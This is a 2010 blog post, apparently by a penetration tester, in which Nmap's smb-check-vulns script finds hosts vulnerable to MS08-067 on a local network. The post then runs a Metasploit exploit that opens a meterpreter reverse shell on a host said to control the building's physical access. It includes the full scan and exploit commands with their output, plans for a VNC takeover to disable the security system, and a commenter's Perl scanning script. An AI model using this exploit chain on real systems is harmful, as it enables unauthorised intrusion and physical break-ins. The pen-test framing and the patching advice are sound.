Nmap’s NSE ‘smb-check-vulns’ script

Posted: 21st April 2010 by Matt in hacks, security
Tags: , , , , ,
3

While I was waiting for my brute force attack to complete against the PDC.. I needed to find another way in that wasn’t going to take forever. So, while that was running.. I used the NSE ‘smb-check-vulns’ script to see if there were any systems on the network that the admin neglected to patch.

nmap -p445 --script=smb-check-vulns 192.168.0.*|perl -le 'while(){
if(/^.*?\((\d+.\d+.\d+.\d+)\):$/) { $i = $1; } if(/^\|\_\s+(.*?)\:\s+VULNERABLE$/ && $i ne "")
{ print "$i is vulnerable to $1"; }}'

192.168.0.5 is vulnerable to MS08-067
192.168.0.7 is vulnerable to MS08-067
192.168.0.11 is vulnerable to MS08-067

Uhoh.. :-)

Through the research that I’ve done, I know that .5 is a file server, .7 is just a regular workstation, and .11 is actually the security system for their office.. like, it controls the physical access to the building. Not good.

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.11
RHOST => 192.168.0.11
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.100
LHOST => 192.168.0.100
msf exploit(ms08_067_netapi) > exploit

.....
[*] Meterpreter session 1 opened (192.168.0.100:4444 -> 192.168.0.11:1251)
meterpreter > pwd
C:\WINNT\system32

The whole process took less than a minute. From here, if I were actually attacking this network instead of just pen testing, I would inject a VNC DLL and get remote access to the desktop, allowing me to literally control physical access to their office. IE – lets just turn off the security system so I can walk right into the building after hours without having to use a pesky fob.

Patch your systems, people. Windows automatic update is your friend.

If you enjoyed this post, make sure you subscribe to my RSS feed! You can also follow me on Twitter here.
Share

Related posts:

  1. Pwn2Own lesson learned – Don’t browse the web.
  1. Matt says:
    May 1, 2010 at 1:50 pm

    I took that oneliner and actually scripted it for ease of use..


    $eth = $ARGV[0];

    if($eth eq "") {
    print "Usage: smb-check.pl eth< #>\n";
    exit(0);
    }

    @ifconfig = `ifconfig $eth`;

    foreach $line (@ifconfig) {
    if($line =~ /^.*?inet\s+addr\:(\d+.\d+.\d+).\d+.*/) {
    $range = $1;
    }
    }

    open(NMAP, "nmap -p445 --script=smb-check-vulns $range.*|") || die "$!";
    while() {
    if(/^.*?\((\d+.\d+.\d+.\d+)\):$/) {
    $i = $1;
    }
    if(/^\|\_\s+(.*?)\:\s+VULNERABLE$/ && $i ne "") {
    print "$i is vulnerable to $1\n";
    $vuln++;
    }
    }

    if($vuln eq "") {
    print "No vulnerable hosts found\n";
    exit(0);
    }

  2. Joaquin says:
    June 24, 2010 at 1:24 pm

    Matt,

    Once again, thanks for the post. While I’ve used Nmap extensively, I haven’t made it a priority to learn the advanced features, such as the NSE. You’ve definitely provided me with the incentive to reprioritize and order Fyodor’s book already. Great info, short and to the point. Keep up the good work.

  3. Matt says:
    June 24, 2010 at 2:15 pm

    @Joaquin: Thanks for the comment.. yeah, nmap’s NSE is sweet.. I definitely recommend playing with it. :-)

Spam Protection by WP-SpamFree